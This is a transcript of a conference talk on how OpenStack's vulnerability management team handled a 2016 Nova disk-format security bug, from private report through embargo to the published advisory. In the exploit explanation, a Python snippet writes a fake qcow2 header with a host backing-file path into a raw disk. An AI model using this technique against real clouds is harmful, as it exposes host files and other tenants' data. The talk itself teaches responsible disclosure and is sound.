I'm in the Nova team at Red Hat, and Red Hat has an upstream first policy, and Tristan is in the upstream security team. It's not the first time we've worked together, we've worked on a few security bugs before, but it is the first time we've presented together. If you would like a full copy of the presentation, then by all means email myself or Tristan at the end and we will send you a copy. The other thing is, at other conferences I've been to there has been somewhere to upload slides to. Does anybody happen to know where we're supposed to upload slides to? No. OK. Well, as soon as I get a nagging email, that would be fantastic. As soon as I find out where it is I will upload the slides there. But I couldn't find it when I was looking before. The other thing is that the detail of this talk is really in a couple of external URLs, which we will give clearly on the board, so you can go and look at those. The first one is this one, which is nice and phone friendly for you.

This talk is about the vulnerability management team process, which we're going to call the VMT process for short. As I was saying before, everything in this talk could really be inferred from the documentation. Go to that website: it documents the whole process really well. All we're really going to do is talk through a specific instance where we followed this process with a specific security bug. In doing that, we hope to add a practical flavour to what is, by design, a very nice, boring, reliable process. We'd like to introduce you to some roles and responsibilities that you're going to encounter whilst going through that process, and maybe introduce some design decisions that were involved in constructing the VMT process.

So this presentation will talk about vulnerabilities. A vulnerability is a weakness which allows an attacker to reduce a system's information assurance. It's commonly referred to as a security bug or a CVE bug, and indeed it's a special type of bug that needs extra attention because of its potential negative impact. Vulnerability management is about assessing the impact and severity of a bug report, and about designing a security patch following a process that respects the rule of least disclosure. Least disclosure is about disclosing the vulnerability details to an increasing number of people over time, but only to the people required to reach the next step.

So we're going to be using this diagram throughout the talk. This is the VMT process, and you'll find the original version of this diagram on the link I gave you earlier; this is exactly the same diagram, just reformatted slightly. But to summarise: way at the top, somebody reports a bug, and then we've got two streams. Over on the right we've got what an engineer does, so an engineer works on a fix. Over on the left we've got what the VMT does: the VMT ensures everything is properly documented and coordinates with all relevant parties. And then we get to embargoed disclosure. At embargoed disclosure we provide the fix early to certain critical users, as the sketch below summarises.
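To keep the shape of that diagram in mind as we go, here is a rough sketch of the stages as data. This is my own paraphrase of the diagram, not any official VMT tooling, and the stage names are made up for illustration:

```python
# A loose paraphrase of the VMT process diagram. Two tracks (engineering
# and VMT coordination) run in parallel between the report and the
# embargoed disclosure.
VMT_PROCESS = [
    ("report", "someone files a bug marked 'private security'"),
    ("triage", "the VMT confirms it describes a real vulnerability"),
    ("fix + coordination", "engineers develop a patch off-Gerrit while "
                           "the VMT documents impact and coordinates"),
    ("embargoed disclosure", "critical downstream users get the fix early"),
    ("public disclosure", "bug opened, fixes released, advisory published"),
]

for stage, what in VMT_PROCESS:
    print(f"{stage:>22}: {what}")
```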
And then we get to public disclosure, where we open the bug to everybody and the fixes are released. So why do we follow this process? Now, you are very obviously not legally obliged to follow this process. The process is designed to serve the community. So we've got a couple of competing interests here. The disclosure of unpatched vulnerabilities is not in the community's best interests, but at the same time it's not in the best interests of the community to keep known vulnerabilities secret for a long time, because they tend to leak. So the process is designed to enable you to disclose your vulnerability as quickly as is responsibly possible. And the reason we follow it is because we're good citizens; there's no stick. The process is designed to help you make those responsible disclosure decisions. And Tristan earlier referred to least disclosure. The first step in that disclosure was when you reported the bug to the VMT, and after that the VMT will guide you through further disclosures until the bug is released.

For this talk, I will be talking about everything done by the vulnerability management team, or VMT, and Matt will be talking about everything that is done by Red Hat engineering. But you should know that it's not a two-man show, and we are going to talk on behalf of the many other people who played a part in this.

So, step one: discovering the bug. The bug was originally reported by me on the 22nd of February 2016, and it was just from code inspection. I was working on something else and I noticed something that didn't quite look right, and I decided to look into it a little bit closer. Specifically, I noticed that Nova would do format inspection on a disk if a certain metadata file was missing. And I also knew that there was a way a user could engineer that metadata file to be missing, specifically by doing a resize operation, and a couple of other ways.

So, for anybody who's not familiar with it: format inspection. KVM, which is the hypervisor most used by Nova's libvirt driver, and I think the most used hypervisor in OpenStack, can store data on disk in a number of different formats, but Nova uses raw and qcow2. A raw file is exactly what it sounds like: if we're storing information on the file system, what we've got is a file containing the exact bits that a user wrote to their virtual disk. If we're using qcow2, then qcow2 has some additional features, and those additional features are described by a header which goes at the start of the file. One of the additional features qcow2 provides is backing files. Backing files allow that qcow2 to say: this disk refers to this other file on the compute host. Nova uses them for base images. So when we've got a Glance image and we're using that as a template for a number of different guests, then we've got a base image over here, and then we've got a qcow2 which says: this disk is everything that's in that template over there, plus some changes. And they're really useful. Now, Nova's file system storage uses qcow2 by default, but you can also configure it to use raw. And remember that a raw file is whatever the user wrote to their disk. So if you're using raw on a file system, the user can completely control what's in that file. And that's OK as long as we know it's raw. But if the user can force us to do format inspection, then they have an opportunity to do something underhand, along the lines of the sketch below.
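To show why trusting in-band data is dangerous, here is a minimal sketch of what such a fake header looks like. The field layout comes from the published qcow2 version 2 format; the backing path and file name are hypothetical examples, and this is for understanding the bug rather than a recipe:

```python
import struct

# The leading fields of a qcow2 v2 header, all big-endian: magic, version,
# backing_file_offset, backing_file_size, cluster_bits, virtual disk size.
# A guest that writes these bytes to the start of its raw disk makes naive
# format inspection report "qcow2 with a backing file" instead of "raw".
backing = b"/etc/passwd"  # hypothetical host file an attacker wants to read

header = struct.pack(
    ">4s I Q I I Q",
    b"QFI\xfb",    # qcow2 magic
    2,             # version 2
    72,            # backing_file_offset: just past the 72-byte v2 header
    len(backing),  # backing_file_size
    16,            # cluster_bits (64 KiB clusters)
    1 << 30,       # virtual disk size: 1 GiB
)
header = header.ljust(72, b"\x00")  # remaining v2 header fields left zeroed

with open("disk.img", "r+b") as f:  # hypothetical path to the raw disk
    f.seek(0)
    f.write(header + backing)
```

Anything that afterwards decides the format by sniffing the file content, rather than trusting recorded metadata, will be lied to.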
If the user writes a fake qcow2 header to their raw-backed file, and then engineers things so that we're going to have to inspect that file to work out what's in it, then when we inspect it we're going to think it's qcow2. And if the malicious user writes a fake qcow2 header that says this disk refers to this other file on the host, then when they start their instance up they're not going to see their own data; they're going to see that other file on the host. And even worse than that, if they say this other file on the host is the compute host's root disk, then they can see everything on the compute host, including the data of other users and other tenants. So with that in mind, the bug I thought I saw was that a user could create an instance with an ephemeral disk, write a fake qcow2 header to that disk saying this disk refers to this other file which I'm guessing is present on the host, and then do a resize operation, which causes that metadata file to be deleted or to go missing. Then they restart, and they can see whatever was on the host. When I initially saw that, I actually thought it would be mitigated by SELinux, but as I will touch on a little bit later, it turned out I was wrong and it is not. And more generally, we're looking into that.

So, I think I've found a bug: what do I do? Now, as you probably know, bugs in Nova are quite exceptionally rare, so the chances are that nobody in the room has ever encountered the Nova bug reporting system. But if you had, then you would know that we use Launchpad, and security bugs go in exactly the same place. The security bug reporting process is exactly the same as reporting any other bug, right up to the last step. So we go to Launchpad, we add a summary, we add some further information, and then we scroll down to the bottom of that long blurb. Has anybody ever read that? Not me. And we see the bit at the bottom that says this report contains information that is public, with a little pencil next to it. If we expand that, we can see this is where our visibility options are, and the one we want to choose is private security. And if we do that, it gives us a nice reassuring bar at the top which tells us that when we click submit we're not going to be making it public.

And when you do that, as a member of the vulnerability management team, I am notified of a new bug report against an OpenStack project. The first task for the VMT is to confirm whether the report describes a vulnerability or not. To do that, I subscribe the project's security liaison, in this case the Nova coresec team, and we engage in a discussion to check whether it's considered a vulnerability, because most of the time new bug reports turn out to be benign. So it's better to be safe than sorry. The VMT uses a taxonomy to rank bug reports. Only bugs that can be fixed in master and in all stable releases will be handled by the VMT; we call them class A. Class B indicates a bug that can't be fully fixed, such as one caused by the core architecture or a bad design; those are handled by a security note instead of an advisory. A class C report indicates one that is not really practical; for example, when it depends on guessing a random value such as a UUID, then we don't consider it a practical vulnerability and it does not deserve an advisory. And of course we have extra classes: for bugs only affecting the development branch, which have not been released yet;
for security hardening opportunities, where the default settings are not bad but not great either; and for regular bugs that sometimes get reported as security bugs for some reason. In this case, Matthew clearly described the bug in the report, and thus it was easy to confirm. At that point, the VMT coordinator will start writing an impact description that will be communicated to downstream stakeholders, and it will also serve as the basis for the upcoming advisory, so it's important to get it right at the very beginning. The purpose is to describe the impact from a stakeholder's point of view. Indeed, the technical details of the report do not necessarily matter in themselves; they need to be converted into a format that articulates: who is the actor, for example is it a remote or an authenticated user? What is the action triggering the bug? What is the impact, and what are the consequences? And finally, which deployments are actually affected, and does it need special options or something non-default? Lastly, the impact description will also include reporter credits, as well as the affected versions, which need to be narrowed down.

So, to answer Tristan's questions: the bug in this case can be exploited by a remote authenticated user. The bug is triggered when the user does a resize operation. The impact is read-only access to all storage connected to the compute host, including the data of other users. And it only affects deployments which use raw file system storage, which fortunately is not the default. But to help answer these questions with certainty, I didn't do that myself: I pulled in some colleagues for additional input and a reproducer. And this presents an immediate problem, because we do all of our disclosure management through Launchpad, through the bug, to centralise it, and by default the bug is visible only to me and to the VMT. So I can point my colleagues at it, but they can't see it. As the bug reporter, though, I can open it to whoever I want, which is what I did. So here's the bug, and this is Launchpad, and to open it up to a new person, if you have a look, very small, up at the top right, you'll see other bug subscribers and a link saying subscribe someone else. That is the bit you're looking for. You click subscribe someone else, and that person is added. So in the first instance I added my colleague Dan Berrangé, who looked at the bug, and he pointed out that SELinux was not going to be the defence that I thought it was going to be. That was confirmed by my colleague Lee Yarwood, who actually set up a system to reproduce the issue properly and confirmed that we could exploit the host in the way described. But note that at this point in the process, I still hadn't opened up the bug to many people, or in fact even to my own team.

So, with a better understanding of the severity of the bug, prompted by Tristan's questions, Lee then started working on it immediately, because we realised it was quite severe. This presents us with some practical problems, though, because we can't use public infrastructure, as that would disclose the bug. Specifically, we can't use upstream Gerrit and we can't use upstream CI. And the same goes for the impact description. After having produced a draft and having it validated by Matthew, we also put it on the Launchpad bug, so that all the information is gathered at a single point of coordination. And another VMT coordinator will review and double-check the details, to make sure it's accurate and there are no grammar errors and things like that.
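Putting Tristan's four questions together with the answers just given, the gist of the impact description for this bug can be sketched as structured data. This is an illustrative sketch only: the field names are hypothetical, and the official wording is what ends up in the published advisory:

```python
# Hypothetical field names; the content is taken from the answers above,
# not from the VMT's actual schema.
impact_description = {
    "actor": "remote authenticated user",
    "action": "write a fake qcow2 header to a raw-backed disk, "
              "then perform a resize operation",
    "impact": "read-only access to all storage connected to the compute "
              "host, including other users' and tenants' data",
    "affected": "deployments using raw file system storage (not the default)",
    "credits": "Matthew Booth (Red Hat)",
    "affected_versions": "to be narrowed down per supported branch",
}
```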
Then comes the review process. Now, I said we can't use Gerrit, but we still have to go through a review process, so obviously it's slightly complicated. What we do instead is still develop patches, but instead of posting them to Gerrit, we format them as diff files and post them to the Launchpad bug. And then we get other people who are also subscribed to the bug to review them on there. Something else we need to think about at this stage is that when the bug eventually does become public, when it eventually goes to Gerrit, it is still going to have to go through the same review process that every other patch to Nova goes through. But because of the severity of the impact of the bug, we want it to clear that hurdle very quickly. So a good idea at this stage is to get a core reviewer on board to give it a provisional +2. So what I did was add Dan Smith to the bug, and he reviewed it. We had a little bit of back and forth with Dan, and when he said he was provisionally happy, we decided we were good to go. Well, actually it's not just a good idea: it's mandatory for the VMT to have approval on the Launchpad bug report, because otherwise there is no guarantee it will get merged once public.

To ensure full traceability, we have a CVE number assigned before the issue is communicated to a larger public. We use Common Vulnerabilities and Exposures, in short a CVE number, which is a system that provides a reference method for publicly known vulnerabilities. Once the patch and the impact description are approved, the VMT coordinator will request a CVE number from something called a CNA, a CVE Numbering Authority. For public issues, we request one from the MITRE Corporation, because they handle all the public vulnerabilities. And for private issues, we request them from the Red Hat CNA, which is the historical one that does vulnerability number assignment for Linux. Once we receive the number, it gets attached to the bug report, so that, again, it is the single point of coordination for OpenStack issues. And we now have everything we need to move on to the next step. If the issue is still private, we may do an embargoed disclosure; otherwise, we jump directly to publishing the advisory at that point.

In the spirit of responsible disclosure, the ecosystem, collectively known as the downstream stakeholders, needs to be warned in advance so that they can roll out patches in a coordinated fashion on disclosure day. The first step is then to propose a disclosure date. We use a very short embargo period, from three to five days, excluding Mondays and Fridays. So it can be very short. So, as the bug reporter, the VMT actually asked me when I wanted to disclose, because it's my bug, but they helped me pick. As I said before, we've got these competing desires in the process: we want to disclose as quickly as possible to minimise the risk of leaks, whilst giving ourselves enough time to complete the process. On this occasion, I took advice from both the VMT and Red Hat's internal security team, and this time it was fairly simple to pick a date: it was as soon as we were done, plus a couple of days. However, it's not always quite that simple. For example, there was a previous CVE that we worked on at the end of last year, and the initial disclosure date that I proposed, I think, was the 22nd of December. I proposed this, and the VMT pushed back and said: perhaps that might not be terribly nice to a bunch of sysadmins.
So maybe you could move that by a couple of weeks. So we moved it to just after the new year. But it was still my call. Once this is agreed upon, I'm in charge of sending the pre-OSSA, which is the advance notification document. It includes, basically, the impact description, the CVE number, the pre-approved patch, and the disclosure date, so that everyone is on board with the same bits of information.

So, as Red Hat is an OpenStack distributor, we have customers that are running this stuff in production, and we are actually one of the people on that embargoed disclosure list. We aim to have a fix ready for our customers, along with everybody else who's in a similar situation, ready to go when the bug becomes public. And we firewall ourselves internally on this. At Red Hat, we disclose to ourselves internally at exactly the same time as we disclose to everybody else. So our internal infrastructure team, even though on this occasion the bug came from inside Red Hat, didn't have a head start on anybody else. So on this embargoed disclosure date, we're good to go to start the process of getting this out to our customers. When Lee originally developed the patch, he developed it against upstream, and then he backported it to the supported upstream stable branches. And then he further backported the patch to all supported Red Hat releases. At the embargoed disclosure date, he can then push those backported patches into our downstream Gerrit, which allows us to review them formally within the team, and then push them out to our build infrastructure and into our own CI. And once we've done that, once we've got builds ready, once we've QE'd them, we then need to prepare an internal erratum: we need to package this stuff up so we can give it out to our customers. And we have to do all of this in a three-to-five-day window. So as soon as we push go on the embargoed disclosure, Red Hat release engineering is very, very busy, as I expect are a number of other release engineering teams.

On the disclosure date, I open the bug report and coordinate with a Nova developer to submit the patch to Gerrit, just in case the patch no longer applies, because master may have changed during the embargo period. We also have to be very wary of the test results from the upstream CI system, because if the gate is failing and the patch needs alteration, because there was a regression or a test side effect, we have to quickly contact the stakeholders to tell them that the patch needs to be modified. And if this happens after the patch has been merged and the advisory sent out, we also need to communicate that it was missing something or needed to be changed: we call this an erratum. So at this point, Lee pushed the fix to upstream master and to the supported stable branches, and we started the regular review process. And in this case, it turns out that we had actually introduced a regression, which was unfortunate, as it wasn't caught in review. So we very quickly developed a fix for that, and we pushed that out in a day or so, I think; it was expedited. And as Tristan mentioned, he then had to go back to the OSSA and update it with an erratum to say there was an additional fix. So, once the patch looks good on the gate system and the core developers have approved it, or at least the tests are succeeding, we proceed to produce the final advisory document. One should know that we also use code review to validate the document, with peer review.
And it's based on the YAML description of all the details that we have been presenting so far, plus the bug report URL and the patch numbers, which we didn't have until we opened the bug. So when this review is approved, the website security.openstack.org gets updated with the latest information, and it also renders a nice reStructuredText output that we can send to a couple of mailing lists, such as the openstack and oss-security mailing lists, as well as openstack-announce. So that when it's public, it's really public.

So, the timeline of this bug. It was originally reported by me on the 22nd of February 2016, and we released the fix on the 9th of March 2016. So that was pretty quick. We did this during the Mitaka cycle, and we also backported it upstream to Kilo and Liberty, which were the supported upstream stable branches at the time. Which is a key point, by the way, because there are no other stable branches to backport to. So, is anybody in the room still running Juno? No? Good. Because if you were, then that would still be vulnerable. But distributors, obviously, including Red Hat, support much older releases than that. So we backported this to OSP 5, certainly, and possibly even OSP 4, I can't remember, but that would be at least Icehouse. So, yeah: if you're running upstream stable, it is important to stay on top of patches; otherwise, you're going to be vulnerable to these things. And at this point, the bug is now open. We gave the URL earlier; you can go and have a look at that, and you can read all the comments, including everything that was embargoed at the time. You can see the patch review process and everything. And at this point you are, of course, also expected to create a logo for your security vulnerability, to publish it on a website, and to create a GitHub repo where you can share things about it.

Here are a couple of other examples that illustrate the VMT process pretty well. The first one involved a tricky ten-step exploitation process that took a long time to figure out and a lot of iterations to fix properly. And the second one was a critical network bug that was handled swiftly across all stable branches; I think it was about two weeks. So that was a great example. However, things do not always work out that well. In particular, the process may fail when, for example, a stakeholder does not understand the embargo rules and pushes the patch to Gerrit before the disclosure day, or when the bug report simply gets opened by accident.

So, the short version of this talk, what happens when there is a security issue, can be summarised like this. We need to create a bug and check the private security option if it's relevant. Then the VMT will add an advisory task to the bug. If it's not a vulnerability, that's fine: the task will be closed and we move on. Otherwise, the real process starts. Discussion and patch development happen on the bug report. A CVE number is assigned. Stakeholders are notified in advance. The report is then disclosed, the issue is fixed, and the OSSA is published. And I think that's it. Do you have questions?

Can I ask you to grab the microphone? Thank you. They're recording; they won't be able to hear you if you don't use the microphone.

Yeah, so just a quick comment on that, actually. The CVE number starts a clock running as well, because as soon as it's assigned, the information about which project it's assigned to becomes public, even if the details don't.
So from MITRE, you can go now and look at CVEs that have been assigned but have not been... the information has not been released yet. So if you are a Nova admin, for example, it's a good idea to scan through and basically add those CVEs to your follow list, so that when the information becomes public, you get it right away.

That depends, because first of all the process is actually changing, and MITRE is providing ways to request CVE numbers privately; it used to be through a mailing list, so indeed it was public, and that's why OpenStack is relying on another CNA for private issues. And it turns out that, even for embargoed bugs, Red Hat engineers won't see the Red Hat internal system; the security team that assigns numbers for external projects keeps the same separation, so a Nova developer won't be aware of a CVE request until we get down to the embargoed disclosure. So requesting a CVE does not necessarily expose that much about a new vulnerability, if that was the question.

No, it tells that... I can repeat it. It tells that there is a CVE requested for Nova.

I'm not so sure about that. I think the registers are not necessarily public. If there is a CNA, it keeps a register of it, but you don't know what has been registered.

I thought it was the opposite, actually. The MITRE website used to not update their web page as soon as the disclosure happened, so you wouldn't even know the affected project. Go ahead.

So I'll just follow up on the CVE stuff. I can guarantee you now there is at least one vulnerability in every single OpenStack service that exists today, whether or not there's a waiting CVE for it. So I don't think it really creates a problem with exposure. My actual question is slightly different. What happens when you have a vulnerability reported and you acknowledge that it is a security defect, but let's say it's a design issue or something like that, something you can't easily change or backport?

So, well, again, the VMT will only take care of class A types of bug. So when it's not something we can fix, we won't request a CVE ourselves. However, for those kinds of bugs, we suggest a security note, which will then be written by the security project. And one should know that anyone can actually request a CVE; it's not something we have a privilege on, it's just that we happen to do it for coordination purposes.

I guess in that case we'd be looking to make sure everybody knows what the vulnerability is, and can at least know that they're vulnerable to it and mitigate it if possible. Go ahead.

So, given the size of the project, have you tried to become a CNA yourselves?

That has been discussed, actually; it's not really worth it, because we don't issue that many advisories in the end.

What is your opinion of the embargo? Is it something useful, something good? Or would you want to just get rid of the embargo and publish everything, to get more people reviewing the patch and maybe get more attention on vulnerabilities and security?

So, from a practical engineering point of view, as a Red Hatter with customers, I do actually appreciate the three-day window to try and get a fix into the hands of people who are running this and might be vulnerable, at the same time as it becomes public. It's a tough one; it's probably a philosophical question, but I think it probably does the most good to the most users to get that out there. And Red Hat is not the only entity that gets this information early; public clouds would also be on that list.
All the distributors: so anybody who can justify themselves as being a source of real fixes for real users in the wild is going to be on that list. Pragmatically, I think the embargo is a good thing, but we need to keep it short. What matters is really the period.

Okay, thank you.

More than a month does more harm than good.

You're going to have to be quicker, because we've just gone over time.

Okay, so in this particular case, the actual discovery was driven by a developer's curiosity and diligence and so on. So I'm wondering, do we ever see cases where these exploits are actually used in the wild? Is that a thing in OpenStack?

To our knowledge, no. As vulnerability management team members, we only discuss the bug reports, and there has been no case of in-the-wild exploitation.

I guess that would be more of a question for ops. Does anybody ever see their cloud being exploited? Really? Cool. We should go check that out.

At that point, I think we're going to have to wrap up. If you'd like to contact myself or Tristan, the details are there. The helpful gentleman over there said that I'll get an e-mail to upload the slides somewhere at some point, which I will do. If that doesn't happen, as I say, feel free to e-mail myself or Tristan and we'll send you a copy of the presentation that has all the speakers' notes in it. Thank you very much.